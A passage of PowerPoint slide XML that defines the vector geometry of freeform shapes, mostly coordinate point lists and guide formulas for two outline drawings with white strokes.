                  <a:gd name="T64" fmla="*/ 180 w 204"/>
                  <a:gd name="T65" fmla="*/ 64 h 142"/>
                  <a:gd name="T66" fmla="*/ 186 w 204"/>
                  <a:gd name="T67" fmla="*/ 69 h 142"/>
                  <a:gd name="T68" fmla="*/ 188 w 204"/>
                  <a:gd name="T69" fmla="*/ 77 h 142"/>
                  <a:gd name="T70" fmla="*/ 193 w 204"/>
                  <a:gd name="T71" fmla="*/ 81 h 142"/>
                  <a:gd name="T72" fmla="*/ 203 w 204"/>
                  <a:gd name="T73" fmla="*/ 86 h 142"/>
                  <a:gd name="T74" fmla="*/ 203 w 204"/>
                  <a:gd name="T75" fmla="*/ 93 h 142"/>
                  <a:gd name="T76" fmla="*/ 200 w 204"/>
                  <a:gd name="T77" fmla="*/ 95 h 142"/>
                  <a:gd name="T78" fmla="*/ 191 w 204"/>
                  <a:gd name="T79" fmla="*/ 97 h 142"/>
                  <a:gd name="T80" fmla="*/ 184 w 204"/>
                  <a:gd name="T81" fmla="*/ 94 h 142"/>
                  <a:gd name="T82" fmla="*/ 173 w 204"/>
                  <a:gd name="T83" fmla="*/ 92 h 142"/>
                  <a:gd name="T84" fmla="*/ 171 w 204"/>
                  <a:gd name="T85" fmla="*/ 98 h 142"/>
                  <a:gd name="T86" fmla="*/ 166 w 204"/>
                  <a:gd name="T87" fmla="*/ 98 h 142"/>
                  <a:gd name="T88" fmla="*/ 156 w 204"/>
                  <a:gd name="T89" fmla="*/ 97 h 142"/>
                  <a:gd name="T90" fmla="*/ 143 w 204"/>
                  <a:gd name="T91" fmla="*/ 104 h 142"/>
                  <a:gd name="T92" fmla="*/ 137 w 204"/>
                  <a:gd name="T93" fmla="*/ 101 h 142"/>
                  <a:gd name="T94" fmla="*/ 132 w 204"/>
                  <a:gd name="T95" fmla="*/ 101 h 142"/>
                  <a:gd name="T96" fmla="*/ 126 w 204"/>
                  <a:gd name="T97" fmla="*/ 112 h 142"/>
                  <a:gd name="T98" fmla="*/ 108 w 204"/>
                  <a:gd name="T99" fmla="*/ 108 h 142"/>
                  <a:gd name="T100" fmla="*/ 94 w 204"/>
                  <a:gd name="T101" fmla="*/ 104 h 142"/>
                  <a:gd name="T102" fmla="*/ 90 w 204"/>
                  <a:gd name="T103" fmla="*/ 100 h 142"/>
                  <a:gd name="T104" fmla="*/ 82 w 204"/>
                  <a:gd name="T105" fmla="*/ 95 h 142"/>
                  <a:gd name="T106" fmla="*/ 74 w 204"/>
                  <a:gd name="T107" fmla="*/ 98 h 142"/>
                  <a:gd name="T108" fmla="*/ 66 w 204"/>
                  <a:gd name="T109" fmla="*/ 107 h 142"/>
                  <a:gd name="T110" fmla="*/ 66 w 204"/>
                  <a:gd name="T111" fmla="*/ 112 h 142"/>
                  <a:gd name="T112" fmla="*/ 66 w 204"/>
                  <a:gd name="T113" fmla="*/ 119 h 142"/>
                  <a:gd name="T114" fmla="*/ 59 w 204"/>
                  <a:gd name="T115" fmla="*/ 122 h 142"/>
                  <a:gd name="T116" fmla="*/ 48 w 204"/>
                  <a:gd name="T117" fmla="*/ 120 h 142"/>
                  <a:gd name="T118" fmla="*/ 39 w 204"/>
                  <a:gd name="T119" fmla="*/ 121 h 142"/>
                  <a:gd name="T120" fmla="*/ 34 w 204"/>
                  <a:gd name="T121" fmla="*/ 123 h 142"/>
                  <a:gd name="T122" fmla="*/ 31 w 204"/>
                  <a:gd name="T123" fmla="*/ 136 h 142"/>
                  <a:gd name="T124" fmla="*/ 26 w 204"/>
                  <a:gd name="T125" fmla="*/ 142 h 14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204"/>
                  <a:gd name="T190" fmla="*/ 0 h 142"/>
                  <a:gd name="T191" fmla="*/ 204 w 204"/>
                  <a:gd name="T192" fmla="*/ 142 h 14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204" h="142">
                    <a:moveTo>
                      <a:pt x="26" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="142"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36422" name="Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1541" y="3227"/>
                <a:ext cx="135" cy="762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 93 w 135"/>
                  <a:gd name="T1" fmla="*/ 697 h 762"/>
                  <a:gd name="T2" fmla="*/ 73 w 135"/>
                  <a:gd name="T3" fmla="*/ 722 h 762"/>
                  <a:gd name="T4" fmla="*/ 65 w 135"/>
                  <a:gd name="T5" fmla="*/ 715 h 762"/>
                  <a:gd name="T6" fmla="*/ 44 w 135"/>
                  <a:gd name="T7" fmla="*/ 713 h 762"/>
                  <a:gd name="T8" fmla="*/ 57 w 135"/>
                  <a:gd name="T9" fmla="*/ 698 h 762"/>
                  <a:gd name="T10" fmla="*/ 43 w 135"/>
                  <a:gd name="T11" fmla="*/ 682 h 762"/>
                  <a:gd name="T12" fmla="*/ 27 w 135"/>
                  <a:gd name="T13" fmla="*/ 674 h 762"/>
                  <a:gd name="T14" fmla="*/ 20 w 135"/>
                  <a:gd name="T15" fmla="*/ 659 h 762"/>
                  <a:gd name="T16" fmla="*/ 27 w 135"/>
                  <a:gd name="T17" fmla="*/ 644 h 762"/>
                  <a:gd name="T18" fmla="*/ 25 w 135"/>
                  <a:gd name="T19" fmla="*/ 619 h 762"/>
                  <a:gd name="T20" fmla="*/ 25 w 135"/>
                  <a:gd name="T21" fmla="*/ 585 h 762"/>
                  <a:gd name="T22" fmla="*/ 19 w 135"/>
                  <a:gd name="T23" fmla="*/ 579 h 762"/>
                  <a:gd name="T24" fmla="*/ 22 w 135"/>
                  <a:gd name="T25" fmla="*/ 568 h 762"/>
                  <a:gd name="T26" fmla="*/ 8 w 135"/>
                  <a:gd name="T27" fmla="*/ 551 h 762"/>
                  <a:gd name="T28" fmla="*/ 15 w 135"/>
                  <a:gd name="T29" fmla="*/ 535 h 762"/>
                  <a:gd name="T30" fmla="*/ 18 w 135"/>
                  <a:gd name="T31" fmla="*/ 551 h 762"/>
                  <a:gd name="T32" fmla="*/ 31 w 135"/>
                  <a:gd name="T33" fmla="*/ 544 h 762"/>
                  <a:gd name="T34" fmla="*/ 34 w 135"/>
                  <a:gd name="T35" fmla="*/ 522 h 762"/>
                  <a:gd name="T36" fmla="*/ 47 w 135"/>
                  <a:gd name="T37" fmla="*/ 503 h 762"/>
                  <a:gd name="T38" fmla="*/ 43 w 135"/>
                  <a:gd name="T39" fmla="*/ 476 h 762"/>
                  <a:gd name="T40" fmla="*/ 48 w 135"/>
                  <a:gd name="T41" fmla="*/ 451 h 762"/>
                  <a:gd name="T42" fmla="*/ 40 w 135"/>
                  <a:gd name="T43" fmla="*/ 442 h 762"/>
                  <a:gd name="T44" fmla="*/ 25 w 135"/>
                  <a:gd name="T45" fmla="*/ 426 h 762"/>
                  <a:gd name="T46" fmla="*/ 33 w 135"/>
                  <a:gd name="T47" fmla="*/ 375 h 762"/>
                  <a:gd name="T48" fmla="*/ 35 w 135"/>
                  <a:gd name="T49" fmla="*/ 354 h 762"/>
                  <a:gd name="T50" fmla="*/ 51 w 135"/>
                  <a:gd name="T51" fmla="*/ 314 h 762"/>
                  <a:gd name="T52" fmla="*/ 62 w 135"/>
                  <a:gd name="T53" fmla="*/ 281 h 762"/>
                  <a:gd name="T54" fmla="*/ 63 w 135"/>
                  <a:gd name="T55" fmla="*/ 255 h 762"/>
                  <a:gd name="T56" fmla="*/ 68 w 135"/>
                  <a:gd name="T57" fmla="*/ 206 h 762"/>
                  <a:gd name="T58" fmla="*/ 74 w 135"/>
                  <a:gd name="T59" fmla="*/ 166 h 762"/>
                  <a:gd name="T60" fmla="*/ 80 w 135"/>
                  <a:gd name="T61" fmla="*/ 123 h 762"/>
                  <a:gd name="T62" fmla="*/ 79 w 135"/>
                  <a:gd name="T63" fmla="*/ 97 h 762"/>
                  <a:gd name="T64" fmla="*/ 86 w 135"/>
                  <a:gd name="T65" fmla="*/ 70 h 762"/>
                  <a:gd name="T66" fmla="*/ 90 w 135"/>
                  <a:gd name="T67" fmla="*/ 10 h 762"/>
                  <a:gd name="T68" fmla="*/ 105 w 135"/>
                  <a:gd name="T69" fmla="*/ 21 h 762"/>
                  <a:gd name="T70" fmla="*/ 116 w 135"/>
                  <a:gd name="T71" fmla="*/ 61 h 762"/>
                  <a:gd name="T72" fmla="*/ 134 w 135"/>
                  <a:gd name="T73" fmla="*/ 92 h 762"/>
                  <a:gd name="T74" fmla="*/ 111 w 135"/>
                  <a:gd name="T75" fmla="*/ 121 h 762"/>
                  <a:gd name="T76" fmla="*/ 112 w 135"/>
                  <a:gd name="T77" fmla="*/ 150 h 762"/>
                  <a:gd name="T78" fmla="*/ 106 w 135"/>
                  <a:gd name="T79" fmla="*/ 166 h 762"/>
                  <a:gd name="T80" fmla="*/ 90 w 135"/>
                  <a:gd name="T81" fmla="*/ 221 h 762"/>
                  <a:gd name="T82" fmla="*/ 84 w 135"/>
                  <a:gd name="T83" fmla="*/ 261 h 762"/>
                  <a:gd name="T84" fmla="*/ 82 w 135"/>
                  <a:gd name="T85" fmla="*/ 329 h 762"/>
                  <a:gd name="T86" fmla="*/ 74 w 135"/>
                  <a:gd name="T87" fmla="*/ 383 h 762"/>
                  <a:gd name="T88" fmla="*/ 58 w 135"/>
                  <a:gd name="T89" fmla="*/ 424 h 762"/>
                  <a:gd name="T90" fmla="*/ 55 w 135"/>
                  <a:gd name="T91" fmla="*/ 473 h 762"/>
                  <a:gd name="T92" fmla="*/ 68 w 135"/>
                  <a:gd name="T93" fmla="*/ 505 h 762"/>
                  <a:gd name="T94" fmla="*/ 57 w 135"/>
                  <a:gd name="T95" fmla="*/ 515 h 762"/>
                  <a:gd name="T96" fmla="*/ 59 w 135"/>
                  <a:gd name="T97" fmla="*/ 564 h 762"/>
                  <a:gd name="T98" fmla="*/ 51 w 135"/>
                  <a:gd name="T99" fmla="*/ 592 h 762"/>
                  <a:gd name="T100" fmla="*/ 37 w 135"/>
                  <a:gd name="T101" fmla="*/ 654 h 762"/>
                  <a:gd name="T102" fmla="*/ 64 w 135"/>
                  <a:gd name="T103" fmla="*/ 686 h 762"/>
                  <a:gd name="T104" fmla="*/ 100 w 135"/>
                  <a:gd name="T105" fmla="*/ 761 h 762"/>
                  <a:gd name="T106" fmla="*/ 77 w 135"/>
                  <a:gd name="T107" fmla="*/ 757 h 762"/>
                  <a:gd name="T108" fmla="*/ 98 w 135"/>
                  <a:gd name="T109" fmla="*/ 744 h 762"/>
                  <a:gd name="T110" fmla="*/ 97 w 135"/>
                  <a:gd name="T111" fmla="*/ 724 h 762"/>
                  <a:gd name="T112" fmla="*/ 91 w 135"/>
                  <a:gd name="T113" fmla="*/ 706 h 762"/>
                  <a:gd name="T114" fmla="*/ 35 w 135"/>
                  <a:gd name="T115" fmla="*/ 708 h 762"/>
                  <a:gd name="T116" fmla="*/ 42 w 135"/>
                  <a:gd name="T117" fmla="*/ 691 h 762"/>
                  <a:gd name="T118" fmla="*/ 20 w 135"/>
                  <a:gd name="T119" fmla="*/ 480 h 762"/>
                  <a:gd name="T120" fmla="*/ 29 w 135"/>
                  <a:gd name="T121" fmla="*/ 450 h 762"/>
                  <a:gd name="T122" fmla="*/ 27 w 135"/>
                  <a:gd name="T123" fmla="*/ 483 h 762"/>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35"/>
                  <a:gd name="T187" fmla="*/ 0 h 762"/>
                  <a:gd name="T188" fmla="*/ 135 w 135"/>
                  <a:gd name="T189" fmla="*/ 762 h 762"/>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35" h="762">
                    <a:moveTo>
                      <a:pt x="112" y="694"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="663"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="551"/>
